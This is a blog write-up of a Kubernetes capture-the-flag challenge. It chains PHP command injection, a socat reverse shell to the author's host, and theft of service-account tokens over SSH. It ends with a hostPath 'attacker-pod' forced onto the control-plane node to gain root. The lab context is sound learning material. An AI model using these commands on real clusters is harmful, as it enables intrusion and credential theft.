10 minute read

Introduction

Redguard had a Kubernetes hacking challenge at Area 41. Now since this is kind of my current area of interest, I had to solve this. Unfortunately I did not do it on Friday, but postponed it to Saturday, and therefore missed the challenge prices, but at least I wanted to use this challenge to get into the habit of doing Writeups. Now that Redguard published the Solution I needed to write this before reading the official Blogpost. So here we go.

After the registration, I got a mail with the Information, to connect to the cluster.

Your Kubernetes Challenge instance is now available at the following IP address: xxx.xxx.xxx.xxx Point your /etc/hosts for hello-world.tld to xxx.xxx.xxx.xxx. After you’ve done this “https://hello-world.tld/” will be your starting point.

Try to get full access to the master node and if you’ve found the flag at the end of the challenge (look for /root/flag.txt), please submit it at https://k8s-challenge.redguard.ch/flag?email=’my-email’

Visiting the page showed a simple Page with the Text Welcome to disenchant-vulnerable-app-demo-on-public-docker-hub-567654mwq69 unfortunately I did not take a Screenshot, so this would be the first Lesson learned. Also, this seems to be the point for a Disclaimer. I did start solving this on Friday side by side with my two coworkers Philip and Philipp. So while I started Gobuster to find directories, Philipp managed to find a PHP “shell” on the page. Seeing that Gobuster did not bring up something useful, I continued using this shell.

Btw. the title also hints directly to the used Docker Image disenchant/vulnerable-app-demo which may be the official path to find this command injection, but I think Philipp found it using Google and GitHub or a Blogpost. But I think I will write another Post on how to get this information from the Docker Image later.

So this “Shell” was a command injection using the parameter named shell that was directly executed using php’s system function.

<?php
if ($_GET['shell']) {
  echo "<pre>";
  system($_GET['shell']);
  echo "<pre/>";
}
?>

First Pod - restricted-viewer

It was no surprise, that the current UID/GID is www-data with the home directory in /var/www. Initially I played around just with this command injection, and did not create a reverse shell. At home on Saturday I used my own VM and Socat to get a better Reverse Shell like this:

# on my VM
$ socat TCP-LISTEN:9001,reuseaddr FILE:`tty`,raw,echo=0
# on the Pod
$ ./socat TCP4:xxx.xxx.xxx.xxx:9001 EXEC:bash,pty,sterr,setsid,sigint,sane

This was possible, since there was no restriction to download anything from the Internet. So I did use curl to get Socat and also Kubectl.

$ curl -LO https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
$ curl -LO https://dl.k8s.io/release/v1.30.0/bin/linux/amd64/kubectl

This open connection to the Internet could have been prevented using Kubernetes Network Policies, but that is another story.

With kubectl and the mounted service account token in /var/run/secrets/kubernetes.io/serviceaccount/ we were able to ask what we are allowed to do.

$ ./kubectl auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:applications:restricted-viewer
UID                                                 87b788cf-cfb7-4fa0-89d7-1659cbd2c1d6
Groups                                              [system:serviceaccounts system:serviceaccounts:applications system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=60171891-8d19-447b-842c-d26d29863eb9]
Extra: authentication.kubernetes.io/node-name       [hack-me-m02]
Extra: authentication.kubernetes.io/node-uid        [f9407f57-c773-4ffa-bb30-bb91f39839b6]
Extra: authentication.kubernetes.io/pod-name        [disenchant-vulnerable-app-demo-on-public-docker-hub-567654mwq69]
Extra: authentication.kubernetes.io/pod-uid         [a907130c-e0f5-4fb2-a173-bb7e48026005]

This tells us that we are using a service account with the role restriced-viewer and are currently running in the namespace applications on the node hack-me-m02.

$ ./kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]

The first part shows some default entries, the interesting part is that we are allowed to list namespaces and nodes.

$ ./kubectl get nodes
NAME          STATUS                     ROLES                  AGE    VERSION
hack-me       Ready,SchedulingDisabled   control-plane,master   2d1h   v1.30.0
hack-me-m02   Ready                      worker                 2d1h   v1.30.0

$ ./kubectl get namespaces
NAME              STATUS   AGE
applications      Active   2d1h
default           Active   2d1h
ingress-nginx     Active   2d1h
jobs              Active   2d1h
kube-node-lease   Active   2d1h
kube-public       Active   2d1h
kube-system       Active   2d1h
test              Active   2d1h

Knowing that the allowed actions, can vary depending on the namespace, I checked all the namespaces, getting the following Information.

$ ./kubectl auth can-i --list -n applications
Resources                                       Non-Resource URLs                      Resource Names   Verbs
...
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]
$ ./kubectl auth can-i --list -n default
Resources                                       Non-Resource URLs                      Resource Names   Verbs
...
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]
pods                                            []                                     []               [list]
$ ./kubectl auth can-i --list -n jobs
Resources                                       Non-Resource URLs                      Resource Names   Verbs
...
pods/log                                        []                                     []               [list get]
pods                                            []                                     []               [list get]
jobs.batch/log                                  []                                     []               [list get]
jobs.batch                                      []                                     []               [list get]
namespaces                                      []                                     []               [list]
nodes                                           []                                     []               [list]

Second Pod - my log has something to tell you

The namespace default and jobs allow us to list the pods.

$ ./kubectl get pods -n default -o wide
NAME                                   READY   STATUS    RESTARTS   AGE    IP              NODE          NOMINATED NODE   READINESS GATES
the-princess-is-in-another-namespace   1/1     Running   0          2d1h   10.244.88.129   hack-me-m02   <none>           <none>
$ ./kubectl get pods -n jobs -o wide

NAME                   READY   STATUS      RESTARTS   AGE     IP              NODE          NOMINATED NODE   READINESS GATES
hello-28631096-25vr6   0/1     Completed   0          2m52s   10.244.88.157   hack-me-m02   <none>           <none>
hello-28631097-65zcq   0/1     Completed   0          112s    10.244.88.158   hack-me-m02   <none>           <none>
hello-28631098-vppcs   0/1     Completed   0          52s     10.244.88.159   hack-me-m02   <none>           <none>

In jobs we are also allowed to get the logs of the batch jobs. If you check the existing Pods you realize that they are running every minute, and get deleted after 3 minutes (or only 3 instances will be kept). So let’s check one of the newest Pods for logs.

$ ./kubectl -n jobs logs hello-28631098-vppcs
Sat Jun  8 16:58:01 UTC 2024
My environment variables:
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.96.0.1:443
HOSTNAME=hello-28631098-vppcs
SHLVL=1
HOME=/root
SSH_PASSWORD_ACCESS=true
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
SSH_PASSWORD=s3cr3t-area41
SSH_HOST=openssh-server-service.applications.svc.cluster.local
SSH_USER=test-user
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_SERVICE_HOST=10.96.0.1
PWD=/
SSH_PORT=2222
StrictHostKeyChecking=no

It looks like the Job is listing all it’s environment variables. Beside some of the default kubernetes variables, we find some more from a mounted Secret, that belong to ssh.

SSH_PASSWORD=s3cr3t-area41
SSH_HOST=openssh-server-service.applications.svc.cluster.local
SSH_USER=test-user
SSH_PORT=2222
StrictHostKeyChecking=no

Btw, since we have the ‘get’ on Pods in namespace ‘jobs’ we can get all this information about the executed command, mounted secrets and stuff, by reading the pod yaml using

$ ./kubectl -n jobs get pod hello-28631098-vppcs -o yaml

…but again, I did not copy the output for this ;)

Ok, so now we know, there is a service running in our current namespace which should be reachable with ssh.

Disclaimer: This step took me quite a while figuring out how to ssh into this service. I am not 100% sure what caused the Problem. Maybe my socat shell was part of the problem, or not being allowed to write /var/www/.ssh. I was not able to get a stable interactive ssh session.

So after a lot of try-and-error, and using different ways the following worked to copy the files to the current pod. There was an ssh error, but it worked, I got new kubernetes credentials to check.

$ sshpass -p 's3cr3t-area41' scp -o StrictHostKeyChecking=no -P2222 test-user@openssh-server-service.applications.svc.cluster.local:/var/run/secrets/kubernetes.io/serviceaccount/token ./token
$ sshpass -p 's3cr3t-area41' scp -o StrictHostKeyChecking=no -P2222 test-user@openssh-server-service.applications.svc.cluster.local:/var/run/secrets/kubernetes.io/serviceaccount/ca.crt ./ca.crt
...
Could not create directory '/var/www/.ssh'.
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).

Third Pod - pod-executor

Now that we have new credentials, we want to see what we are allowed to do. First I added a new context to my local kube config, still in the initial first pod.

kubectl config set-cluster next --server=https://kubernetes.default --certificate-authority=./ca.crt
kubectl config set-context next --cluster=next
kubectl config set-credentials user --token={token}
kubectl config set-context next --user=user 
kubectl config use-context next

As you may have guessed, it is time to check what we are allowed to do, as we did before. This time our role seems to be pod-executor, and the only interesting namespace seems to be default.

$ ./kubectl auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:applications:pod-executer
UID                                                 18dec8f8-44c9-486d-93b3-3c4db042b004
Groups                                              [system:serviceaccounts system:serviceaccounts:applications system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=8fc42565-13d4-4e6b-b4bf-d226440f088a]
Extra: authentication.kubernetes.io/node-name       [hack-me-m02]
Extra: authentication.kubernetes.io/node-uid        [f9407f57-c773-4ffa-bb30-bb91f39839b6]
Extra: authentication.kubernetes.io/pod-name        [openssh-server-6d4b85f979-zxwkd]
Extra: authentication.kubernetes.io/pod-uid         [91bf1f54-f817-4d26-a7d5-600196eb490b]
$ ./kubectl auth can-i --list -n default
Resources                                       Non-Resource URLs                      Resource Names   Verbs
pods/exec                                       []                                     []               [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
pods/log                                        []                                     []               [get list]
pods                                            []                                     []               [get list]

We are allowed, to get/list pods and logs and also execute commands in existing pods in namespace default.

$ ./kubectl -n default logs the-princess-is-in-another-namespace
/docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration
/docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/
/docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh
10-listen-on-ipv6-by-default.sh: info: Getting the checksum of /etc/nginx/conf.d/default.conf
10-listen-on-ipv6-by-default.sh: info: Enabled listen on IPv6 in /etc/nginx/conf.d/default.conf
/docker-entrypoint.sh: Sourcing /docker-entrypoint.d/15-local-resolvers.envsh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh
/docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh
/docker-entrypoint.sh: Configuration complete; ready for start up
2024/06/06 15:30:51 [notice] 1#1: using the "epoll" event method
2024/06/06 15:30:51 [notice] 1#1: nginx/1.27.0
2024/06/06 15:30:51 [notice] 1#1: built by gcc 12.2.0 (Debian 12.2.0-14) 
2024/06/06 15:30:51 [notice] 1#1: OS: Linux 6.8.0-35-generic
2024/06/06 15:30:51 [notice] 1#1: getrlimit(RLIMIT_NOFILE): 1048576:1048576
2024/06/06 15:30:51 [notice] 1#1: start worker processes
2024/06/06 15:30:51 [notice] 1#1: start worker process 29
2024/06/06 15:30:51 [notice] 1#1: start worker process 30

The logs contain some more things that may be of interest, but first, lets get a shell in the pod.

$ ./kubectl -n default exec  --stdin --tty the-princess-is-in-another-namespace -- /bin/bash
# id
uid=0(root) gid=0(root) groups=0(root)

I did not invest much time to check the files listed in the log, but went straight to the known drill. Check what we are allowed to do with the service account of the current pod.

$ ./kubectl auth whoami
ATTRIBUTE                                           VALUE
Username                                            system:serviceaccount:default:pod-creator
UID                                                 05aba103-34d2-401c-993c-58a11b709555
Groups                                              [system:serviceaccounts system:serviceaccounts:default system:authenticated]
Extra: authentication.kubernetes.io/credential-id   [JTI=c98828d5-91f2-411b-abc9-798c0c0469e3]
Extra: authentication.kubernetes.io/node-name       [hack-me-m02]
Extra: authentication.kubernetes.io/node-uid        [f9407f57-c773-4ffa-bb30-bb91f39839b6]
Extra: authentication.kubernetes.io/pod-name        [the-princess-is-in-another-namespace]
Extra: authentication.kubernetes.io/pod-uid         [8dd9a749-6f0e-4243-b8c6-016b54fcc38e]

# ./kubectl auth can-i --list -n default
# ./kubectl auth can-i --list -n applications
# ./kubectl auth can-i --list -n test
# ./kubectl auth can-i --list -n jobst
Resources                                       Non-Resource URLs                      Resource Names   Verbs
pods                                            []                                     []               [create get list]
pods/exec                                       []                                     []               [create]
pods/log                                        []                                     []               [get list]

Bingo! we have a promising role of pod-creator and are allowed to create pods in the namespaces applications, default, jobs and test. So the direct way to the cluster node will be a malicious pod mounting the root filesystem of the node - Easy peasy lemons squeezy.

# cat attacker-pod.yml
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod-control
  name: attacker-pod-control
spec:
  volumes:
  - name: host-fs
    hostPath:
      path: /
  containers:
  - image: ubuntu
    imagePullPolicy: Always
    name: attacker-pod
    command: ["/bin/sh", "-c", "sleep infinity"]
    volumeMounts:
      - name: host-fs
        mountPath: /root
  restartPolicy: Never
# kubectl apply -f attacker-pod.yml -n default
Error from server (Forbidden): error when creating "attacker-pod.yml": pods "attacker-pod" is forbidden: violates 
PodSecurity "baseline:latest": hostPath volumes (volume "host-fs")

Ok, the Pod Security Admission on the namespace does not allow the creation of Pods with a hostPath mount. But this is also something depending on the Namespace. So we just have to try the other namespaces, and Bingo!

# kubectl apply -f attacker-pod.yml -n test
pod/attacker-pod created

Disclaimer: At this point again, I lost some time on the worker node hack-me-m02. I tried somehow to pivot to the control-plane node hack-me which did not work for me. So the takeaway at this point is the wonderful HackTricks Cloud edition - https://cloud.hacktricks.xyz You will find many cloud related information as with the classic https://book.hacktricks.xyz/

Final destination - the control-plane

After some time on the worker node, I got a step back and was curious about the node status SchedulingDisabled. Maybe there is a way to enforce scheduling a pod on the hack-me control-plane node. Long story short, yes there is. With a small edit in our attacker-pod.yml we get our pod scheduled on the control-plane node.

spec:
  nodeName: hack-me
# kubectl apply -f attacker-pod.yml -n test
pod/attacker-pod created

# kubectl -n test exec --stdin --tty attacker-pod-control -- /bin/bash
root@attacker-pod-control:/# chroot /root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/hostname
hack-me
# cat /root/flag.txt

Lessons learned / ToDo

Doing better writeups

As already mentioned above, I have to take Screenshots of the things I want to illustrate. Also, after writing this, I am unsure about the length of this. Is it to long, too much “Bla Bla”, or ok, or even needs more explanation. I guess this may also depend on what you search. Just a short “show me how to solve” or more information.

Potential Posts

Since I work quite a lot with Docker images I may also have some tricks on how to handle them. A first blog may be on how to get information from the used Image disenchant/vulnerable-app-demo.

Hacking Kubernetes

This challenge was IMHO not very hard and pretty straight forward, and from my work experience I can think of many other Security features, like Kubernetes Network Policies, preventing root Pods and limiting the Service Accounts. But still I have learned some things, especially with the help of HackTricks Cloud.

What I did here was all manually and as you saw repetitive. My developer heart tells me that this needs to be automated, and I think many of it is already. HackTricks list some Tools that I definitely have to try some day.